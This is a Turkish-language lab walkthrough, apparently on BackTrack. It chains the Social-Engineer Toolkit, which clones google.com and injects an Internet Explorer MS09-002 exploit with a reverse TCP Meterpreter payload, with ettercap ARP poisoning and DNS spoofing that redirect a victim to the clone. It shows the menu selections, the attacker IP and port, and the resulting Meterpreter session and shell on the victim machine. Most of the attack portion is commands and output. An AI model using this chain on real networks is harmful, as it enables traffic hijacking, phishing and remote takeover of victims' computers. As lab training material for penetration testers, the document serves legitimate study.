Amaç:
Sosyal Mühendislik ve DNS
spoofing saldırısının bütünleşik olarak uygulanması.
Senaryo:
Kurban makinesi ile aynı ağda bulunan Saldırgan üzerinde Sosyal Mühendislik
Aracı ile www.google.com sitesi
klonlanacaktır. Klonlama işlemi tamamlandıktan sonra ettercap aracı ile DNS
spoofing yapılarak ağ üzerindeki tüm DNS sorguları saldırgan makinesine
yönlendirilecektir. Spoof edilmiş DNS üzerinde www.google.com
adresini klonladığımız yeni adrese yönlendirerek kurban makinesi ele geçirilmiş
olacaktır.
Öncelikle kısaca kullanacağımız iki araçtan bahsedelim. Birincisi Social Engineering Toolkit (SET). SET, çeşitli
sosyal mühendislik saldırıları için hazırlanmış bir araç olarak karşımıza
çıkıyor. Oltalama (Phishing) saldırıları, websitesi klonlama gibi yetenekleri
mevcut. Ayrıntılı bilgiye buradan ulaşabilirsiniz. İkinci olarak kullanacağımız
araç ise ettercap. Bu araç DNS ve
ARP spoofing için biçilmiş kaftan. Kullanım detaylarını aşağıda ayrıntılarıyla
göreceğiz. Ama yinede detaylı bilgi istiyorsanız şöyle buyurun.
Şimdi SET ile websitesi
klonlama işlemine başlayalım.
pentest/exploits/set
dizini altında SET’i çalıştırıyoruz.
root@bt:/pentest/exploits/set# ./set
Select from the menu:
1)
Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer
Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
Gelen seçeneklerden Social-Engineering (1)’i
seçiyoruz.
set> 1
---------------------
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack
Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
Website Attack (2)’yi seçerek devam ediyoruz.
set> 2
---------------------
1) Java Applet Attack Method
2) Metasploit Browser Exploit
Method
3) Credential Harvester Attack
Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack
Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning
Certificate
99) Return to Main Menu
(2) seçeneğinde bulunan Metasploit’i seçerek devam ediyoruz.
Burada metasploit modülünü kullanacağımızı belirtiyoruz.
set:webattack>2
---------------------
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Web Templates seçiyoruz. www.google.com sitesinin klonunu alacağımız
için template olarak hazırda bulunduğu için bunu kullanıyoruz. Site cloner seçeneği
ile herhangi bir websitesinin klonunu alabiliriz.
set:webattack>1
---------------------
Klonladığımız sitenin hangi
adrese yönleneceğini belirtiyoruz.
set:webattack> Your interface IP Address:192.168.1.128
---------------------
1. Java Required
2. Gmail
3. Google
4. Facebook
5. Twitter
Klonlayacağımız site Google olduğu için
seçip devam ediyoruz.
set:webattack>
Select a template:3---------------------
Karşımıza
kullanabileceğimiz exploitlerden çıkan bir liste çıkıyor. 25’i seçerek devam ediyoruz. Eğer karşıdaki
sistem hakkında bilgimiz yoksa 32 seçeneğini seçmek faydalı olacaktır.
Enter the browser exploit you would like
to use [8]:
19)..
20) Apple QuickTime 7.6.7 Marshaled_pUnk
Code Execution
21) Microsoft Help Center XSS and Command
Execution (MS10-042)
22) Microsoft Internet Explorer
iepeers.dll Use After Free (MS10-018)
23) Microsoft Internet Explorer
"Aurora" Memory Corruption (MS10-002)
24) Microsoft Internet Explorer Tabular
Data Control Exploit (MS10-018)
25)
Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
26) Microsoft Internet Explorer Style
getElementsbyTagName Corruption (MS09-072)
27) ..
32) ..
set:payloads>25
---------------------
1) Windows Shell
Reverse_TCP
Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP
Meterpreter Spawn a meterpreter
shell on victim and send back to attacker
3) Windows Reverse_TCP VNC
DLL
Spawn a VNC server on victim and send back to attacker
4) …
Payload olarak Reverse_TCP Meterpreter kullanmak
istiyoruz.
set:payloads>2
---------------------
Reverse bağlantının
yapılacağı port numarasını giriyoruz.
set:payloads> Port to use for the reverse [443]:4444
---------------------
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for
MSF Attack....
[*] Malicious iframe injection
successful...crafting payload.
***************************************************
Web Server Launched. Welcome to the SET Web
Attack.
***************************************************
…
[*]
Server started.
“Server started” yazısı ile dinleme işleminin başladığını
anlıyoruz. Kurbanın klonladığımız adresi tıklamasını dört gözle bekliyoruz.Tabi
bunu sağlamak için de DNS spoofing yaparak www.google.com
adresini yukarıda verdiğimiz 192.168.1.128
adresine yönlendirmemiz gerekiyor.
Şimdi ettercap aracı ile DNS
spoofing işlemlerine adım adım başlayalım.
Komut satırından ettercap –G yazarak çalıştırıyoruz. G ile arayüz açılmasını sağlamış
oluyoruz.
root@bt: ettercap –G
Aşağıdaki gibi bir ara yüz
açılıyor. Burada Sniff sekmesi altında
Unified Sniffing’i seçerek işlemi
başlatıyoruz.
Network interface’imizi seçerek devam ediyoruz.
Ağımızda bulunan
makineleri bulmak için Hosts altında
Scan for hosts seçeneğini
tıklıyoruz. İşlem tamamlandıktan sonra yine aynı yerden Hosts List’i seçerek bulunan makineleri listeliyoruz.
DNS spoofing yapmak istediğimiz makineleri seçerek Add to Target 1 ve Add to
Target 2 diyerek ekliyoruz. Burada listelenen makineler içinde 192.168.1.1
DNS sunucusu. 192.168.1.129 ise ele geçirmek istediğimiz kurban makinesi.
Saldırı yapacağımız makineleri ekledikten sonra Mitm seçeneği altında ARP
Poisoning’i seçiyoruz. Peki burada neden ARP poisoning seçme ihtiyacı
hissediyoruz. DNS spoofing yaparken kurban makinesi üzerinde DNS makinesinin
ARP kayıtlarını saldırgan makinesinin MAC adresi ile değiştirmemiz gerekiyor Böylece DNS sorgusu yapmak isteyen kurban
saldırgan üzerinden geçecektir.
Açılan pencerede sniff remote connections seçeneğini
seçerek devam ediyoruz.
Daha sonra Start sekmesi altında Start sniffing’i seçerek ARP poisoning
işlemini başlatıyoruz.
ARP poisoning işleminin
başladığını test edelim. Öncelikle bir üst ekran çıktısında da görüldüğü gibi
192.168.1.1 IP’li DNS sunucusunun MAC adresi 00:50:56:C0:00:02 şeklinde. Aşağıdaki şekilde görüldüğü gibi Kurban
makinesi üzerinde DNS sunucusunun MAC adresi 00:0C:29:58:AC:4A olarak değişti. Peki bu MAC adresi kime
ait?
Yukarıda Kurban
makinesinin ARP kayıtlarında bulunan MAC adresi saldırgan makinesine ait.
Aşağıdaki şekilde eth1 karşısında görülmektedir.
Kurban makinesi DNS sunucusu olarak saldırgan’ı gördüğüne göre DNS
spoofing işlemlerine başlayabiliriz. Öncelikle saldırgan makinesi üzerine gelen
DNS sorgularının SET ile tanımladığımız 192.168.1.1
adresine yönlendirilmesi gerekiyor. Bunu yapabilmek için etter.dns konfigürasyon dosyasını vi editör ile açıyoruz. Burada istenilen editör kullanılabilir.
Daha sonra şekildeki gibi www.google.com
adresini 192.168.1.128 olarak
ekliyoruz, kaydedip çıkıyoruz.
DNS spoofing’i aktif hale getirmek için Plugins sekmesi altında Manage
the plugins seçeneğini seçiyoruz.
Karşımıza gelen pluginler
altında dns_spoof’u seçiyoruz.
Şimdi kurbanın www.google.com adresine gitmesini bekliyoruz.
Baktık gitmiyor biz gidip giriyoruz J
Şekilde görüldüğü gibi
klonladığımız Google sayfası açıldı. Bunu iki şekilde anlıyoruz. Birincisi Lab
ortamımızın internet erişimi olmadığı için bu sayfanın normal şartlarda
gelmemesi lazım. İkincisi ise aşağıda ettercap
üzerinde görülen google.com spoofed to
192.168.1.128 mesajı.
Kurbanı spoof edilmiş DNS
üzerinden 192.168.1.128 adresine yönlendirdiğimize göre şimdi sıra geldi SET’e
bakmaya. Meterpreter session 1 opened
mesajı bize başarılı bir şekilde kurban makinesini ele geçirdiğimizi
gösteriyor.
[*] Sending stage (752128 bytes) to
192.168.1.129
[*] Sending Internet Explorer 7 CFunctionPointer
Uninitialized Memory Corruption to 192.168.1.129:1032...
[*] Current server process: iexplore.exe (3520)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2468
[+] Successfully migrated to process
Interrupt: use the 'exit' command to quit
msf exploit(ms09_002_memory_corruption)
> sessions
Active sessions
===============
Id
Type
Information
Connection
--
----
-----------
----------
Açılan meterpreter oturumunu çağırıyoruz.
msf
exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
Kurban makinesinde olduğumuzun doğruluğunu
test ediyoruz.
meterpreter
> shell
Process 3476 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and
Settings\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS
Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.1.129
Subnet Mask . . . . . . . . . . . :
255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and
Settings\Administrator\Desktop>
Artık güç bizde..
-GG
